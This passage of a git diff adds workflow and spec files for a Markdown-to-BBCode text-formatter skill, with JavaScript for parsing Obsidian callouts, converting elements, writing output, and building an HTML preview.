| `[hr]` | 显示为文本 | 使用 Markdown `---` |
|
||||
| `[table]` | 支持有限 | 转为列表或代码块 |
|
||||
| HTML tags | 不支持 | 仅使用 BBCode |
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 加载配置和分析
|
||||
|
||||
```javascript
|
||||
const config = JSON.parse(Read(`${workDir}/input-config.json`));
|
||||
const analysis = JSON.parse(Read(`${workDir}/analysis.json`));
|
||||
const content = config.original_content;
|
||||
```
|
||||
|
||||
### Step 2: Callout 配置
|
||||
|
||||
```javascript
|
||||
// Callout type -> rendering config: display icon, accent color, and the
// Chinese label emitted into the BBCode output (labels are runtime strings,
// so they stay in Chinese).
// NOTE(review): the original comment mentioned "pixel-level font sizes",
// but no size field is stored here — sizes are applied by the transformer.
const CALLOUT_CONFIG = {
  // informational
  note: { icon: '📝', color: '#2196F3', label: '注意' },
  info: { icon: 'ℹ️', color: '#2196F3', label: '信息' },
  abstract: { icon: '📄', color: '#2196F3', label: '摘要' },
  summary: { icon: '📄', color: '#2196F3', label: '摘要' },
  tldr: { icon: '📄', color: '#2196F3', label: '摘要' },

  // success / tips
  tip: { icon: '💡', color: '#4CAF50', label: '提示' },
  hint: { icon: '💡', color: '#4CAF50', label: '提示' },
  success: { icon: '✅', color: '#4CAF50', label: '成功' },
  check: { icon: '✅', color: '#4CAF50', label: '完成' },
  done: { icon: '✅', color: '#4CAF50', label: '完成' },

  // warnings
  warning: { icon: '⚠️', color: '#FF9800', label: '警告' },
  caution: { icon: '⚠️', color: '#FF9800', label: '注意' },
  attention: { icon: '⚠️', color: '#FF9800', label: '注意' },
  question: { icon: '❓', color: '#FF9800', label: '问题' },
  help: { icon: '❓', color: '#FF9800', label: '帮助' },
  faq: { icon: '❓', color: '#FF9800', label: 'FAQ' },
  todo: { icon: '📋', color: '#FF9800', label: '待办' },

  // errors / danger
  danger: { icon: '❌', color: '#F44336', label: '危险' },
  error: { icon: '❌', color: '#F44336', label: '错误' },
  bug: { icon: '🐛', color: '#F44336', label: 'Bug' },
  important: { icon: '⭐', color: '#F44336', label: '重要' },

  // other
  example: { icon: '📋', color: '#9C27B0', label: '示例' },
  quote: { icon: '💬', color: 'gray', label: '引用' },
  cite: { icon: '💬', color: 'gray', label: '引用' }
};

// Callout header detector (supports the optional +/- fold marker and an
// optional title after the [!type] tag), e.g. "> [!warning]- Custom title".
const CALLOUT_PATTERN = /^>\s*\[!(\w+)\][+-]?(?:\s+(.+))?$/;
|
||||
```
|
||||
|
||||
### Step 3: Callout 解析器
|
||||
|
||||
```javascript
|
||||
/**
 * Split raw text into an ordered list of segments: callout blocks and
 * plain lines.
 * @param {string} text - Markdown source.
 * @returns {Array<{isCallout: true, type: string, title: string|null, content: string}
 *         | {isCallout: false, line: string}>} Segments in document order.
 */
function parseCallouts(text) {
  const segments = [];
  const rows = text.split('\n');

  for (let idx = 0; idx < rows.length; ) {
    const header = rows[idx].match(CALLOUT_PATTERN);

    if (!header) {
      // Ordinary line — pass it through untouched.
      segments.push({ isCallout: false, line: rows[idx] });
      idx += 1;
      continue;
    }

    // Callout header found: gather the following quoted lines as its body.
    const body = [];
    idx += 1;
    while (idx < rows.length && rows[idx].startsWith('>')) {
      body.push(rows[idx].replace(/^>\s*/, ''));
      idx += 1;
    }

    segments.push({
      isCallout: true,
      type: header[1].toLowerCase(),
      title: header[2] || null,
      content: body.join('\n')
    });
  }

  return segments;
}
|
||||
```
|
||||
|
||||
### Step 4: BBCode+MD 转换器
|
||||
|
||||
```javascript
|
||||
/**
 * Convert Markdown (plus a handful of HTML tags) into the BBCode+Markdown
 * hybrid format used for forum posts.
 *
 * Conversion rules (per format-rules spec):
 * - H1/H2/H3 use pixel sizes 150/120/100; H4-H6 degrade to plain bold.
 * - Separators stay as Markdown `---` ([hr] does not render on the target forums).
 * - Lists use the `•` character ([list][*] renders poorly on some forums).
 *
 * @param {string} text - Markdown/HTML source (callouts already converted).
 * @returns {string} Trimmed BBCode+MD hybrid text.
 */
function formatBBCodeMD(text) {
  let result = text;

  // ===== Headings (pixel-based sizes) =====
  result = result.replace(/^######\s*(.+)$/gm, '[b]$1[/b]');
  result = result.replace(/^#####\s*(.+)$/gm, '[b]$1[/b]');
  result = result.replace(/^####\s*(.+)$/gm, '[b]$1[/b]');
  result = result.replace(/^###\s*(.+)$/gm, '[size=100][color=#333][b]$1[/b][/color][/size]');
  result = result.replace(/^##\s*(.+)$/gm, '[size=120][color=#2196F3][b]$1[/b][/color][/size]');
  result = result.replace(/^#\s*(.+)$/gm, '[size=150][color=#2196F3][b]$1[/b][/color][/size]');

  // ===== Inline text styles (longest markers first: *** before ** before *) =====
  result = result.replace(/\*\*\*(.+?)\*\*\*/g, '[b][i]$1[/i][/b]');
  result = result.replace(/\*\*(.+?)\*\*/g, '[b]$1[/b]');
  result = result.replace(/__(.+?)__/g, '[b]$1[/b]');
  result = result.replace(/\*(.+?)\*/g, '[i]$1[/i]');
  result = result.replace(/_(.+?)_/g, '[i]$1[/i]');
  result = result.replace(/~~(.+?)~~/g, '[s]$1[/s]');
  result = result.replace(/==(.+?)==/g, '[color=yellow]$1[/color]');

  // ===== HTML → BBCode =====
  result = result.replace(/<mark>(.+?)<\/mark>/g, '[color=yellow]$1[/color]');
  result = result.replace(/<u>(.+?)<\/u>/g, '[u]$1[/u]');
  result = result.replace(/<details>\s*<summary>(.+?)<\/summary>\s*([\s\S]*?)<\/details>/g,
    '[spoiler=$1]$2[/spoiler]');

  // ===== Code =====
  result = result.replace(/```(\w*)\n([\s\S]*?)```/g, '[code]$2[/code]');
  // Inline code is left untouched (some forums lack font=monospace support).

  // ===== Images and links =====
  // BUG FIX: images MUST be converted before links. Otherwise the link
  // pattern consumes the `[alt](url)` part of `![alt](url)` first and the
  // image is emitted as a broken `![url=...]alt[/url]` fragment.
  result = result.replace(/!\[([^\]]*)\]\(([^)]+)\)/g, '[img]$2[/img]');
  result = result.replace(/\[([^\]]+)\]\(([^)]+)\)/g, '[url=$2]$1[/url]');

  // ===== Plain blockquotes (non-callout; callouts handled earlier) =====
  result = result.replace(/^>\s+(.+)$/gm, '[quote]$1[/quote]');

  // ===== Lists (bullet character) =====
  result = result.replace(/^[-*+]\s+(.+)$/gm, '• $1');

  // ===== Horizontal rules: keep Markdown `---`; [hr] is not rendered =====

  return result.trim();
}
|
||||
```
|
||||
|
||||
### Step 5: Callout 转换
|
||||
|
||||
```javascript
|
||||
/**
 * Replace Obsidian-style callout blocks with BBCode [quote] blocks.
 * Non-callout lines pass through unchanged.
 * @param {string} text - Markdown source.
 * @returns {string} Text with callouts rendered as BBCode quotes.
 */
function convertCallouts(text) {
  const pieces = [];

  for (const segment of parseCallouts(text)) {
    if (!segment.isCallout) {
      pieces.push(segment.line);
      continue;
    }

    // Unknown callout types fall back to the `note` style.
    const cfg = CALLOUT_CONFIG[segment.type] || CALLOUT_CONFIG.note;
    const heading = segment.title || cfg.label;

    // Wrap in [quote]; the title line uses pixel size 100 per the format rules.
    pieces.push(
      `[quote]\n[size=100][color=${cfg.color}][b]${cfg.icon} ${heading}[/b][/color][/size]\n\n${segment.content}\n[/quote]`
    );
  }

  return pieces.join('\n');
}
|
||||
```
|
||||
|
||||
### Step 6: 执行转换
|
||||
|
||||
```javascript
|
||||
// 1. Convert Obsidian callouts first, so their leading `>` lines are not
//    consumed by the generic blockquote rule inside formatBBCodeMD.
let formattedContent = convertCallouts(content);

// 2. Apply the generic Markdown/HTML → BBCode conversion.
formattedContent = formatBBCodeMD(formattedContent);

// 3. Collapse runs of three or more newlines into a single blank line.
formattedContent = formattedContent.replace(/\n{3,}/g, '\n\n');
|
||||
```
|
||||
|
||||
### Step 7: 保存转换结果
|
||||
|
||||
```javascript
|
||||
// Save the converted text.
const outputFile = 'output.bbcode.txt';
Write(`${workDir}/${outputFile}`, formattedContent);

// Record the output location and content so Phase 4 can pick them up.
config.output_file = outputFile;
config.formatted_content = formattedContent;
Write(`${workDir}/input-config.json`, JSON.stringify(config, null, 2));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `output.bbcode.txt`
|
||||
- **Format**: BBCode + Markdown 混合格式
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 标题使用像素值 (150/120/100)
|
||||
- [ ] 未使用 `[align]` 标签
|
||||
- [ ] 未使用 `[hr]` 标签
|
||||
- [ ] 分隔线使用 `---`
|
||||
- [ ] Callout 正确转换为 [quote]
|
||||
- [ ] 颜色值使用 hex 格式
|
||||
- [ ] 内容完整无丢失
|
||||
|
||||
## Next Phase
|
||||
|
||||
→ [Phase 4: Output & Preview](04-output-preview.md)
|
||||
183
.claude/skills/text-formatter/phases/04-output-preview.md
Normal file
@@ -0,0 +1,183 @@
|
||||
# Phase 4: Output & Preview
|
||||
|
||||
输出最终结果并提供预览。
|
||||
|
||||
## Objective
|
||||
|
||||
- 保存格式化后的内容到文件
|
||||
- 提供预览功能
|
||||
- 显示转换统计信息
|
||||
|
||||
## Input
|
||||
|
||||
- 依赖: `input-config.json`, `output.*`
|
||||
- 配置: `{workDir}/input-config.json`
|
||||
|
||||
## Execution Steps
|
||||
|
||||
### Step 1: 加载结果
|
||||
|
||||
```javascript
|
||||
// Load the pipeline state produced by the earlier phases.
const config = JSON.parse(Read(`${workDir}/input-config.json`));
const analysis = JSON.parse(Read(`${workDir}/analysis.json`));
// Phase 3 recorded the converted output file name in the config.
const outputFile = `${workDir}/${config.output_file}`;
const formattedContent = Read(outputFile);
|
||||
```
|
||||
|
||||
### Step 2: 生成统计摘要
|
||||
|
||||
```javascript
|
||||
const summary = {
|
||||
input: {
|
||||
method: config.input_method,
|
||||
original_length: config.original_content.length,
|
||||
word_count: config.original_content.split(/\s+/).length
|
||||
},
|
||||
output: {
|
||||
format: config.target_format,
|
||||
file: outputFile,
|
||||
length: formattedContent.length
|
||||
},
|
||||
elements: analysis.stats,
|
||||
reading_time: analysis.semantics?.estimated_reading_time || 1
|
||||
};
|
||||
|
||||
console.log(`
|
||||
╔════════════════════════════════════════════════════════════════╗
|
||||
║ Text Formatter Summary ║
|
||||
╠════════════════════════════════════════════════════════════════╣
|
||||
║ Input: ${summary.input.word_count} words (${summary.input.original_length} chars)
|
||||
║ Output: ${summary.output.format} → ${summary.output.file}
|
||||
║ Elements Converted:
|
||||
║ • Headings: ${summary.elements.headings}
|
||||
║ • Paragraphs: ${summary.elements.paragraphs}
|
||||
║ • Lists: ${summary.elements.lists}
|
||||
║ • Code Blocks: ${summary.elements.code_blocks}
|
||||
║ • Links: ${summary.elements.links}
|
||||
║ Estimated Reading Time: ${summary.reading_time} min
|
||||
╚════════════════════════════════════════════════════════════════╝
|
||||
`);
|
||||
```
|
||||
|
||||
### Step 3: HTML 预览(如适用)
|
||||
|
||||
```javascript
|
||||
if (config.target_format === 'HTML') {
|
||||
// 生成完整 HTML 文件用于预览
|
||||
const previewHtml = `<!DOCTYPE html>
|
||||
<html lang="zh-CN">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>Text Formatter Preview</title>
|
||||
<style>
|
||||
body {
|
||||
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
|
||||
line-height: 1.6;
|
||||
max-width: 800px;
|
||||
margin: 0 auto;
|
||||
padding: 2rem;
|
||||
background: #f5f5f5;
|
||||
}
|
||||
.content {
|
||||
background: white;
|
||||
padding: 2rem;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
|
||||
}
|
||||
h1, h2, h3, h4, h5, h6 { color: #333; margin-top: 1.5em; }
|
||||
code { background: #f0f0f0; padding: 2px 6px; border-radius: 3px; }
|
||||
pre { background: #282c34; color: #abb2bf; padding: 1rem; border-radius: 6px; overflow-x: auto; }
|
||||
pre code { background: none; padding: 0; }
|
||||
blockquote { border-left: 4px solid #ddd; margin: 0; padding-left: 1rem; color: #666; }
|
||||
a { color: #0066cc; }
|
||||
img { max-width: 100%; }
|
||||
hr { border: none; border-top: 1px solid #ddd; margin: 2rem 0; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="content">
|
||||
${formattedContent}
|
||||
</div>
|
||||
</body>
|
||||
</html>`;
|
||||
|
||||
Write(`${workDir}/preview.html`, previewHtml);
|
||||
|
||||
// 可选:在浏览器中打开预览
|
||||
// Bash(`start "${workDir}/preview.html"`); // Windows
|
||||
// Bash(`open "${workDir}/preview.html"`); // macOS
|
||||
}
|
||||
```
|
||||
|
||||
### Step 4: 显示输出内容
|
||||
|
||||
```javascript
|
||||
// 显示格式化后的内容
|
||||
console.log('\n=== Formatted Content ===\n');
|
||||
console.log(formattedContent);
|
||||
console.log('\n=========================\n');
|
||||
|
||||
// 提示用户
|
||||
console.log(`
|
||||
📁 Output saved to: ${outputFile}
|
||||
${config.target_format === 'HTML' ? '🌐 Preview available: ' + workDir + '/preview.html' : ''}
|
||||
|
||||
💡 Tips:
|
||||
- Copy the content above for immediate use
|
||||
- Or access the saved file at the path shown
|
||||
`);
|
||||
```
|
||||
|
||||
### Step 5: 询问后续操作
|
||||
|
||||
```javascript
|
||||
const nextAction = await AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "需要执行什么操作?",
|
||||
header: "后续操作",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "完成", description: "结束格式化流程" },
|
||||
{ label: "转换为其他格式", description: "选择另一种输出格式" },
|
||||
{ label: "重新编辑", description: "修改原始内容后重新格式化" }
|
||||
]
|
||||
}
|
||||
]
|
||||
});
|
||||
|
||||
if (nextAction["后续操作"] === "转换为其他格式") {
|
||||
// 返回 Phase 1 选择新格式
|
||||
console.log('请重新运行 /text-formatter 选择其他格式');
|
||||
}
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `output.{ext}` (最终输出)
|
||||
- **File**: `preview.html` (HTML 预览,仅 HTML 格式)
|
||||
- **Console**: 统计摘要和格式化内容
|
||||
|
||||
## Final Output Structure
|
||||
|
||||
```
|
||||
{workDir}/
|
||||
├── input-config.json # 配置信息
|
||||
├── analysis.json # 分析结果
|
||||
├── output.md # Markdown 输出(如选择)
|
||||
├── output.bbcode.txt # BBCode 输出(如选择)
|
||||
├── output.html # HTML 输出(如选择)
|
||||
└── preview.html # HTML 预览页面
|
||||
```
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
- [ ] 输出文件已保存
|
||||
- [ ] 统计信息正确显示
|
||||
- [ ] 预览功能可用(HTML)
|
||||
- [ ] 用户可访问输出内容
|
||||
|
||||
## Completion
|
||||
|
||||
此为最终阶段,格式化流程完成。
|
||||
293
.claude/skills/text-formatter/specs/callout-types.md
Normal file
@@ -0,0 +1,293 @@
|
||||
# Callout Types
|
||||
|
||||
Obsidian 风格的 Callout/Admonition 类型定义和转换规则。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| Phase 2 | 检测 Callout | Detection patterns |
|
||||
| Phase 3 | 格式转换 | Conversion rules |
|
||||
|
||||
---
|
||||
|
||||
## Callout 语法
|
||||
|
||||
### Obsidian 原生语法
|
||||
|
||||
```markdown
|
||||
> [!TYPE] 可选标题
|
||||
> 内容行1
|
||||
> 内容行2
|
||||
```
|
||||
|
||||
### 支持的类型
|
||||
|
||||
| Type | Alias | Icon | Color | 用途 |
|
||||
|------|-------|------|-------|------|
|
||||
| `note` | - | 📝 | blue | 普通提示 |
|
||||
| `info` | - | ℹ️ | blue | 信息说明 |
|
||||
| `tip` | `hint` | 💡 | green | 技巧提示 |
|
||||
| `success` | `check`, `done` | ✅ | green | 成功状态 |
|
||||
| `warning` | `caution`, `attention` | ⚠️ | orange | 警告信息 |
|
||||
| `danger` | `error` | ❌ | red | 危险/错误 |
|
||||
| `bug` | - | 🐛 | red | Bug 说明 |
|
||||
| `example` | - | 📋 | purple | 示例内容 |
|
||||
| `quote` | `cite` | 💬 | gray | 引用内容 |
|
||||
| `abstract` | `summary`, `tldr` | 📄 | blue | 摘要 |
|
||||
| `question` | `help`, `faq` | ❓ | yellow | 问题/FAQ |
|
||||
| `todo` | - | 📋 | orange | 待办事项 |
|
||||
|
||||
---
|
||||
|
||||
## 检测 Pattern
|
||||
|
||||
```javascript
|
||||
// Callout detection regex. The optional trailing [+-] accepts Obsidian's
// foldable variants (`[!NOTE]+` expanded / `[!NOTE]-` collapsed) — this spec's
// own "折叠 Callout" section documents them, and the Phase 3 converter's
// pattern already includes the marker; without it, foldable callouts were
// silently treated as plain quotes.
const CALLOUT_PATTERN = /^>\s*\[!(\w+)\][+-]?(?:\s+(.+))?$/;

/**
 * Detect a callout header line.
 * @param {string} line - A single line of Markdown.
 * @returns {{type: string, title: string|null}|null} Lowercased callout type
 *   and optional title, or null when the line is not a callout header.
 */
function detectCallout(line) {
  const match = line.match(CALLOUT_PATTERN);
  if (match) {
    return {
      type: match[1].toLowerCase(),
      title: match[2] || null
    };
  }
  return null;
}
|
||||
|
||||
/**
 * Parse a complete callout block beginning at `startIndex`.
 * @param {string[]} lines - All source lines.
 * @param {number} startIndex - Index of the candidate header line.
 * @returns {{type: string, title: string|null, content: string, endIndex: number}|null}
 *   Parsed block (endIndex = last line index belonging to it), or null when
 *   the line at startIndex is not a callout header.
 */
function parseCalloutBlock(lines, startIndex) {
  const header = detectCallout(lines[startIndex]);
  if (!header) return null;

  // Collect the quoted body lines that follow the header.
  const body = [];
  let cursor = startIndex + 1;
  while (cursor < lines.length && lines[cursor].startsWith('>')) {
    body.push(lines[cursor].replace(/^>\s*/, ''));
    cursor += 1;
  }

  return {
    ...header,
    content: body.join('\n'),
    endIndex: cursor - 1
  };
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 转换规则
|
||||
|
||||
### BBCode 转换
|
||||
|
||||
```javascript
|
||||
// Callout type → BBCode styling (icon, color, Chinese display label).
// Unknown types fall back to `note`.
const CALLOUT_BBCODE = {
  note:     { icon: '📝', color: '#2196F3', label: '注意' },
  info:     { icon: 'ℹ️', color: '#2196F3', label: '信息' },
  tip:      { icon: '💡', color: '#4CAF50', label: '提示' },
  success:  { icon: '✅', color: '#4CAF50', label: '成功' },
  warning:  { icon: '⚠️', color: '#FF9800', label: '警告' },
  danger:   { icon: '❌', color: '#F44336', label: '危险' },
  bug:      { icon: '🐛', color: '#F44336', label: 'Bug' },
  example:  { icon: '📋', color: '#9C27B0', label: '示例' },
  quote:    { icon: '💬', color: '#9E9E9E', label: '引用' },
  question: { icon: '❓', color: '#FFEB3B', label: '问题' }
};

/**
 * Render a callout as BBCode.
 * @param {string} type - Callout type (lowercased); unknown types use `note`.
 * @param {string|null} title - Optional title; defaults to the type label.
 * @param {string} content - Callout body text.
 * @param {string} [style='forum'] - 'forum' (visual, sized title) or 'compact'.
 * @returns {string} BBCode [quote] block.
 */
function calloutToBBCode(type, title, content, style = 'forum') {
  const config = CALLOUT_BBCODE[type] || CALLOUT_BBCODE.note;
  const displayTitle = title || config.label;

  if (style === 'compact') {
    return `[quote][b]${config.icon} ${displayTitle}[/b]
${content}[/quote]`;
  }

  // Forum style — matches the documented callout template:
  //   [size=100][color={color}][b]{icon} {title}[/b][/color][/size]
  // FIX: use pixel size 100; the previous `[size=4]` was a 1-7 level size,
  // which the format rules explicitly forbid ("[size=5] → [size=120]").
  return `[quote]
[size=100][color=${config.color}][b]${config.icon} ${displayTitle}[/b][/color][/size]

${content}
[/quote]`;
}
|
||||
```
|
||||
|
||||
### HTML 转换
|
||||
|
||||
```javascript
|
||||
/**
 * Render a callout as an HTML fragment with callout-* CSS hook classes
 * (styled by the accompanying callout CSS in this spec).
 * Unknown types fall back to the `note` style.
 * @param {string} type - Callout type (lowercased).
 * @param {string|null} title - Optional title; defaults to the type label.
 * @param {string} content - Callout body markup, inserted verbatim.
 * @returns {string} HTML <div class="callout callout-{type}"> fragment.
 */
function calloutToHTML(type, title, content) {
  const config = CALLOUT_BBCODE[type] || CALLOUT_BBCODE.note;
  const displayTitle = title || config.label;

  return `<div class="callout callout-${type}">
<div class="callout-title">
<span class="callout-icon">${config.icon}</span>
<span class="callout-title-text">${displayTitle}</span>
</div>
<div class="callout-content">
${content}
</div>
</div>`;
}
|
||||
```
|
||||
|
||||
### Hybrid 转换
|
||||
|
||||
```javascript
|
||||
/**
 * Render a callout in the hybrid output format: an HTML container wrapping
 * a BBCode-styled title line and the raw (Markdown) content.
 * Unknown types fall back to the `note` style.
 * @param {string} type - Callout type (lowercased).
 * @param {string|null} title - Optional title; defaults to the type label.
 * @param {string} content - Callout body text, inserted verbatim.
 * @returns {string} Hybrid HTML+BBCode+MD fragment.
 */
function calloutToHybrid(type, title, content) {
  const config = CALLOUT_BBCODE[type] || CALLOUT_BBCODE.note;
  const displayTitle = title || config.label;

  // HTML container + BBCode styling + MD content
  return `<div class="callout ${type}">

[color=${config.color}][b]${config.icon} ${displayTitle}[/b][/color]

${content}

</div>`;
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Callout CSS 样式
|
||||
|
||||
```css
|
||||
/* Base callout styles */
|
||||
.callout {
|
||||
padding: 1rem;
|
||||
margin: 1rem 0;
|
||||
border-left: 4px solid;
|
||||
border-radius: 4px;
|
||||
background: #f8f9fa;
|
||||
}
|
||||
|
||||
.callout-title {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 0.5rem;
|
||||
font-weight: 600;
|
||||
margin-bottom: 0.5rem;
|
||||
}
|
||||
|
||||
.callout-icon {
|
||||
font-size: 1.2em;
|
||||
}
|
||||
|
||||
/* Type-specific colors */
|
||||
.callout-note, .callout-info {
|
||||
border-color: #2196F3;
|
||||
background: #E3F2FD;
|
||||
}
|
||||
|
||||
.callout-tip, .callout-success {
|
||||
border-color: #4CAF50;
|
||||
background: #E8F5E9;
|
||||
}
|
||||
|
||||
.callout-warning {
|
||||
border-color: #FF9800;
|
||||
background: #FFF3E0;
|
||||
}
|
||||
|
||||
.callout-danger, .callout-bug {
|
||||
border-color: #F44336;
|
||||
background: #FFEBEE;
|
||||
}
|
||||
|
||||
.callout-example {
|
||||
border-color: #9C27B0;
|
||||
background: #F3E5F5;
|
||||
}
|
||||
|
||||
.callout-quote {
|
||||
border-color: #9E9E9E;
|
||||
background: #FAFAFA;
|
||||
}
|
||||
|
||||
.callout-question {
|
||||
border-color: #FFC107;
|
||||
background: #FFFDE7;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 折叠 Callout
|
||||
|
||||
支持可折叠的 Callout 语法:
|
||||
|
||||
```markdown
|
||||
> [!NOTE]+ 默认展开
|
||||
> 内容
|
||||
|
||||
> [!NOTE]- 默认折叠
|
||||
> 内容
|
||||
```
|
||||
|
||||
### BBCode 折叠
|
||||
|
||||
```bbcode
|
||||
[collapse=📝 注意]
|
||||
内容
|
||||
[/collapse]
|
||||
```
|
||||
|
||||
### HTML 折叠
|
||||
|
||||
```html
|
||||
<details class="callout callout-note">
|
||||
<summary>📝 注意</summary>
|
||||
<div class="callout-content">
|
||||
内容
|
||||
</div>
|
||||
</details>
|
||||
```
|
||||
226
.claude/skills/text-formatter/specs/element-mapping.md
Normal file
@@ -0,0 +1,226 @@
|
||||
# Element Mapping
|
||||
|
||||
内容元素到 BBCode + Markdown 混合格式的映射表。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| Phase 2 | 元素识别 | Detection patterns |
|
||||
| Phase 3 | 格式转换 | Conversion rules |
|
||||
|
||||
---
|
||||
|
||||
## Element Detection Patterns
|
||||
|
||||
### 标题检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| ATX 标题 | `/^#{1,6}\s+(.+)$/` | `# Title`, `## Subtitle` |
|
||||
| Setext H1 | `/^(.+)\n={3,}$/` | `Title\n====` |
|
||||
| Setext H2 | `/^(.+)\n-{3,}$/` | `Subtitle\n----` |
|
||||
|
||||
### 列表检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 无序列表 | `/^[\s]*[-*+]\s+(.+)$/` | `- item`, `* item` |
|
||||
| 有序列表 | `/^[\s]*\d+\.\s+(.+)$/` | `1. item`, `2. item` |
|
||||
| 任务列表 | `/^[\s]*[-*]\s+\[([ x])\]\s+(.+)$/` | `- [ ] todo`, `- [x] done` |
|
||||
|
||||
### Callout 检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| Callout 开始 | `/^>\s*\[!(\w+)\](?:\s+(.+))?$/` | `> [!NOTE] 标题` |
|
||||
| Callout 内容 | `/^>\s*(.*)$/` | `> 内容行` |
|
||||
| 可折叠展开 | `/^>\s*\[!(\w+)\]\+/` | `> [!NOTE]+` |
|
||||
| 可折叠收起 | `/^>\s*\[!(\w+)\]-/` | `> [!NOTE]-` |
|
||||
|
||||
### 代码检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 代码块开始 | `/^```(\w*)$/` | ` ```js ` |
|
||||
| 代码块结束 | `/^```$/` | ` ``` ` |
|
||||
| 行内代码 | `/`([^`]+)`/` | `` `code` `` |
|
||||
|
||||
### 其他元素
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 链接 | `/\[([^\]]+)\]\(([^)]+)\)/` | `[text](url)` |
|
||||
| 图片 | `/!\[([^\]]*)\]\(([^)]+)\)/` | `![alt](url)` |
|
||||
| 普通引用 | `/^>\s+(.+)$/` | `> quote` |
|
||||
| 分隔线 | `/^[-*_]{3,}$/` | `---`, `***` |
|
||||
| 高亮 | `/==(.+?)==/` | `==highlight==` |
|
||||
| 粗体 | `/\*\*(.+?)\*\*/` | `**bold**` |
|
||||
| 斜体 | `/\*(.+?)\*/` | `*italic*` |
|
||||
| 删除线 | `/~~(.+?)~~/` | `~~strike~~` |
|
||||
|
||||
### HTML 元素检测
|
||||
|
||||
| 类型 | Pattern | 示例 |
|
||||
|------|---------|------|
|
||||
| 高亮 | `/<mark>(.+?)<\/mark>/` | `<mark>高亮</mark>` |
|
||||
| 折叠块 | `/<details>\s*<summary>(.+?)<\/summary>([\s\S]*?)<\/details>/` | `<details><summary>标题</summary>内容</details>` |
|
||||
| 下划线 | `/<u>(.+?)<\/u>/` | `<u>下划线</u>` |
|
||||
|
||||
---
|
||||
|
||||
## Element Conversion Matrix
|
||||
|
||||
### 标题映射 (Pixel-Based)
|
||||
|
||||
| Element | Markdown | BBCode Output |
|
||||
|---------|----------|---------------|
|
||||
| **H1** | `# text` | `[size=150][color=#2196F3][b]text[/b][/color][/size]` |
|
||||
| **H2** | `## text` | `[size=120][color=#2196F3][b]text[/b][/color][/size]` |
|
||||
| **H3** | `### text` | `[size=100][color=#333][b]text[/b][/color][/size]` |
|
||||
| **H4** | `#### text` | `[b]text[/b]` |
|
||||
| **H5** | `##### text` | `[b]text[/b]` |
|
||||
| **H6** | `###### text` | `[b]text[/b]` |
|
||||
|
||||
### 文本样式映射
|
||||
|
||||
| Element | Markdown/HTML | BBCode |
|
||||
|---------|---------------|--------|
|
||||
| **Bold** | `**text**` 或 `__text__` | `[b]text[/b]` |
|
||||
| **Italic** | `*text*` 或 `_text_` | `[i]text[/i]` |
|
||||
| **Bold+Italic** | `***text***` | `[b][i]text[/i][/b]` |
|
||||
| **Strike** | `~~text~~` | `[s]text[/s]` |
|
||||
| **Underline** | `<u>text</u>` | `[u]text[/u]` |
|
||||
| **Highlight** | `==text==` 或 `<mark>text</mark>` | `[color=yellow]text[/color]` |
|
||||
| **Code (inline)** | `` `text` `` | 保持原样 |
|
||||
|
||||
### HTML 转 BBCode 映射
|
||||
|
||||
| HTML | BBCode |
|
||||
|------|--------|
|
||||
| `<mark>text</mark>` | `[color=yellow]text[/color]` |
|
||||
| `<u>text</u>` | `[u]text[/u]` |
|
||||
| `<details><summary>标题</summary>内容</details>` | `[spoiler=标题]内容[/spoiler]` |
|
||||
|
||||
### 块级元素映射
|
||||
|
||||
| Element | Markdown | BBCode |
|
||||
|---------|----------|--------|
|
||||
| **Code Block** | ` ```lang\ncode\n``` ` | `[code]code[/code]` |
|
||||
| **Quote** | `> text` | `[quote]text[/quote]` |
|
||||
| **HR** | `---` | `---` (保持 Markdown) |
|
||||
| **List Item** | `- text` | `• text` |
|
||||
| **Paragraph** | `text\n\ntext` | `text\n\ntext` |
|
||||
|
||||
### 链接和媒体映射
|
||||
|
||||
| Element | Markdown | BBCode |
|
||||
|---------|----------|--------|
|
||||
| **Link** | `[text](url)` | `[url=url]text[/url]` |
|
||||
| **Image** | `![alt](url)` | `[img]url[/img]` |
|
||||
|
||||
---
|
||||
|
||||
## Callout Mapping
|
||||
|
||||
### 类型到样式映射
|
||||
|
||||
| Callout Type | Color | Icon | Label |
|
||||
|--------------|-------|------|-------|
|
||||
| note | #2196F3 | 📝 | 注意 |
|
||||
| info | #2196F3 | ℹ️ | 信息 |
|
||||
| tip | #4CAF50 | 💡 | 提示 |
|
||||
| hint | #4CAF50 | 💡 | 提示 |
|
||||
| success | #4CAF50 | ✅ | 成功 |
|
||||
| check | #4CAF50 | ✅ | 完成 |
|
||||
| done | #4CAF50 | ✅ | 完成 |
|
||||
| warning | #FF9800 | ⚠️ | 警告 |
|
||||
| caution | #FF9800 | ⚠️ | 注意 |
|
||||
| attention | #FF9800 | ⚠️ | 注意 |
|
||||
| danger | #F44336 | ❌ | 危险 |
|
||||
| error | #F44336 | ❌ | 错误 |
|
||||
| bug | #F44336 | 🐛 | Bug |
|
||||
